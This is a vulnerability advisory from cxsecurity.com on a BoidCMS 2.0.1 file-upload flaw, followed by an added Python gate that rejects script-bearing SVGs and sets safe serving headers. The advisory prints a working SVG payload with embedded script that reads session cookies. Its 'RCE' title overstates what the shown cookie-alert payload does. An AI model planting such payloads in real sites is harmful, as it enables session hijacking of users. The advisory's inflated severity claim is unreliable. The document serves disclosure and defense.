BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING
2023-10-14 05:28:23 Author: cxsecurity.com

## Title: BoidCMS-2.0.1 - FileUpload - RCE - PHPSESSID HIJACKING
## Author: nu11secur1ty
## Date: 10/13/2023
## Vendor: https://boidcms.github.io/#/
## Software: https://github.com/BoidCMS/BoidCMS/releases/tag/v2.0.1
## Reference: https://portswigger.net/web-security/file-upload
## LAB: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
This attack needs two attackers to be complete. The first one has credentials and uses them to upload a malicious SVG file; when he is ready he simply quits the application and sends the malicious URL to the second attacker. Once the second attacker has this URL, he can use it to access EVERY session of EVERY user of this system. This stops when the real admin finds the malicious file, but by then it will be too late for all users of this system. This attack is called TMITM - Two men in the middle!

STATUS: HIGH- Vulnerability

[+]Exploit:

```svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.cookie);
  </script>
</svg>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/boidcms/2023/BoidCMS-2.0.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/10/boidcms-201-fileupload-rce-phpsessid.html)

## Time spent: 01:37:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
<http://nu11secur1ty.com/>
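The defensive counterpart to the upload path described in the advisory: a server-side gate that rejects SVG uploads carrying script-bearing constructs, plus the response headers that keep a user upload from executing in the site's origin even if one slips through. This is an added example, not BoidCMS code or the author's; the gate function, the header set and the embedded sample files are assumptions constructed for illustration (the first sample is a copy of the advisory's SVG).

```python
import re
import xml.etree.ElementTree as ET

# Elements that run script or embed foreign content when an SVG is rendered inline.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

def _local(qname):
    """Strip the XML namespace from a tag or attribute name ('{ns}script' -> 'script')."""
    return qname.rsplit("}", 1)[-1]

def find_active_content(svg_bytes):
    """Return the reasons an uploaded SVG should be rejected; [] means no active content was found."""
    findings = []
    try:
        root = ET.fromstring(svg_bytes)  # expat does not fetch the external DTD referenced by DOCTYPE
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for el in root.iter():
        name = _local(el.tag)
        if name.lower() in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):  # onload=, onclick=, ... event handlers
                findings.append(f"{aname} handler on <{name}>")
            elif aname == "href" and re.match(r"\s*(javascript|data)\s*:", value, re.I):
                findings.append(f"{aname} with active URI on <{name}>")
    return findings

def upload_response_headers():
    """Headers to send when serving user uploads: download only, no script, no MIME sniffing (assumed set)."""
    return {
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "sandbox; script-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }

# Constructed samples: the advisory's SVG and a benign file of the same shape.
ADVISORY_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript"> alert(document.cookie); </script>
</svg>"""
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"/>
</svg>"""
```

Calling `find_active_content(ADVISORY_SVG)` reports the `<script>` element while the benign file passes; a CMS would run this gate before writing the upload to disk and serve the stored file with `upload_response_headers()`.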
Source: https://cxsecurity.com/issue/WLB-2023100032